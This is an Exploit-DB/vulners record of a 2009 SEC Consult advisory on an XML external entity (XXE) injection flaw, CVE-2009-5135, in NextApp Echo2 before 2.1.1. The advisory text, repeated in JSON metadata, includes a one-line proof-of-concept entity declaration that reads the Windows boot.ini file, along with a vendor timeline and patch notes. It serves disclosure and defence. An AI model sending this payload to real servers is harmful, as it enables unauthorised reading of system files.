NextApp Echo < 2.1.1 XML Injection Vulnerability
2009-03-10T00:00:00
ID EDB-ID:8191 Type exploitdb Reporter SEC Consult Modified 2009-03-10T00:00:00
Description
NextApp Echo < 2.1.1 XML Injection Vulnerability. CVE-2009-5135. Remote exploits for multiple platform
SEC Consult Security Advisory < 20090305-0 >
========================================================================
title: NextApp Echo XML Injection Vulnerability
program: NextApp Echo
vulnerable version: Echo2 < 2.1.1
homepage: http://echo.nextapp.com/site/echo2
found: Feb. 2008
by: Anonymous / SEC Consult Vulnerability Lab
permanent link: http://www.sec-consult.com/files/20090305-0_echo_nextapp_xml_injection.txt
========================================================================
Vendor description:
-------------------
Echo is a platform for building web-based applications that approach the capabilities of rich clients. The applications
are developed using a component-oriented and event-driven API, eliminating the need to deal with the "page-based"
nature of browsers. To the developer, Echo works just like a user interface toolkit.
Vulnerability overview:
-----------------------
Unverified XML Data is passed from the client (Webbrowser) to the NextApp Echo Engine and consequently
to an underlying XML Parser. This leading to a typical XML Injection scenario.
Vulnerability description:
--------------------------
All XML requests for the framework are created by javascript and than sent to the Server via POST HTTP requests.
A typical requests would look like the following:
---cut here---
<client-message xmlns="http://www.nextapp.com/products/echo2/climsg" trans-id="3" focus="c_25"><message-part xmlns="" processor="EchoPropertyUpdate"><property component-id="c_25" name="text">aa</property><property component-id="c_25" name="horizontalScroll" value="0"/><property component-id="c_25" name="verticalScroll" value="0"/></message-part><message-part xmlns="" processor="EchoAction"><action component-id="c_25" name="action"/></message-part></client-message>
---cut here---
By manipulating the POST content it is possible to inject arbitrary XML declarations- and tags.
Proof of concept:
-----------------
The following entity declaration would create a new XML entity with the content of the boot.ini file which
can be referenced in the following XML request content:
---cut here---
<?xml version="1.0"?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot.ini">]>
---cut here---
Vulnerable versions:
--------------------
NextApp Echo v2.1.0.rc2
Vendor contact timeline:
------------------------
2009/02/16: Vendor notified via email
2009/02/24: Patch available
Patch/Workaround:
-----------------
The vendor has released an update which addresses the vulnerability. The update can be downloaded at:
http://echo.nextapp.com/site/node/5742
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
# EOF SEC Consult Vulnerability Lab / @2009
# milw0rm.com [2009-03-10]
{"id": "EDB-ID:8191", "type": "exploitdb", "bulletinFamily": "exploit", "title": "NextApp Echo < 2.1.1 XML Injection Vulnerability", "description": "NextApp Echo < 2.1.1 XML Injection Vulnerability. CVE-2009-5135. Remote exploits for multiple platform", "published": "2009-03-10T00:00:00", "modified": "2009-03-10T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/8191/", "reporter": "SEC Consult", "references": [], "cvelist": ["CVE-2009-5135"], "lastseen": "2016-02-01T03:55:41", "viewCount": 10, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-02-01T03:55:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-5135"]}], "modified": "2016-02-01T03:55:41", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://www.exploit-db.com/download/8191/", "sourceData": "SEC Consult Security Advisory < 20090305-0 >\n========================================================================\n title: NextApp Echo XML Injection Vulnerability\n program: NextApp Echo\n vulnerable version: Echo2 < 2.1.1\n homepage: http://echo.nextapp.com/site/echo2\n found: Feb. 2008\n by: Anonymous / SEC Consult Vulnerability Lab\n permanent link: http://www.sec-consult.com/files/20090305-0_echo_nextapp_xml_injection.txt\n========================================================================\n\nVendor description:\n-------------------\n\nEcho is a platform for building web-based applications that approach the capabilities of rich clients. The applications \nare developed using a component-oriented and event-driven API, eliminating the need to deal with the \"page-based\" \nnature of browsers. To the developer, Echo works just like a user interface toolkit.\n\nVulnerability overview:\n-----------------------\n\nUnverified XML Data is passed from the client (Webbrowser) to the NextApp Echo Engine and consequently \nto an underlying XML Parser. This leading to a typical XML Injection scenario.\n\nVulnerability description:\n--------------------------\n\nAll XML requests for the framework are created by javascript and than sent to the Server via POST HTTP requests. \n\nA typical requests would look like the following:\n---cut here---\n<client-message xmlns=\"http://www.nextapp.com/products/echo2/climsg\" trans-id=\"3\" focus=\"c_25\"><message-part xmlns=\"\" processor=\"EchoPropertyUpdate\"><property component-id=\"c_25\" name=\"text\">aa</property><property component-id=\"c_25\" name=\"horizontalScroll\" value=\"0\"/><property component-id=\"c_25\" name=\"verticalScroll\" value=\"0\"/></message-part><message-part xmlns=\"\" processor=\"EchoAction\"><action component-id=\"c_25\" name=\"action\"/></message-part></client-message>\n---cut here---\n\nBy manipulating the POST content it is possible to inject arbitrary XML declarations- and tags.\n\nProof of concept:\n-----------------\n\nThe following entity declaration would create a new XML entity with the content of the boot.ini file which \ncan be referenced in the following XML request content:\n---cut here---\n<?xml version=\"1.0\"?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY mytestentity SYSTEM \"file:///c:\\boot.ini\">]>\n---cut here---\n\nVulnerable versions:\n--------------------\nNextApp Echo v2.1.0.rc2\n\n\nVendor contact timeline:\n------------------------\n2009/02/16: Vendor notified via email\n2009/02/24: Patch available\n\n\nPatch/Workaround:\n-----------------\n\nThe vendor has released an update which addresses the vulnerability. The update can be downloaded at:\n\nhttp://echo.nextapp.com/site/node/5742\n\n--\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Unternehmensberatung GmbH\n\nOffice Vienna\nMooslackengasse 17\nA-1190 Vienna\nAustria\n\nTel.: +43 / 1 / 890 30 43 - 0\nFax.: +43 / 1 / 890 30 43 - 25\nMail: research at sec-consult dot com\nwww.sec-consult.com\n\n# EOF SEC Consult Vulnerability Lab / @2009\n\n# milw0rm.com [2009-03-10]\n", "osvdbidlist": ["52889"]}
{"cve": [{"lastseen": "2020-12-09T19:31:25", "description": "The Java XML parser in Echo before 2.1.1 and 3.x before 3.0.b6 allows remote attackers to read arbitrary files via a request containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.", "edition": 5, "cvss3": {}, "published": "2013-05-02T11:44:00", "title": "CVE-2009-5135", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5135"], "modified": "2018-10-10T19:49:00", "cpe": ["cpe:/a:nextapp:echo:2.0.1", "cpe:/a:nextapp:echo:2.1.0", "cpe:/a:nextapp:echo:3.0", "cpe:/a:nextapp:echo:2.0"], "id": "CVE-2009-5135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5135", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:nextapp:echo:2.0:rc6:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0.1:test2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha13:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:3.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha9:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha16:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha12:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha14:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha15:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha10:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha11:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:rc7:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha8:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0.1:test1:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0.1:test3:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.0:alpha7:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:nextapp:echo:2.1.0:rc4:*:*:*:*:*:*"]}]}
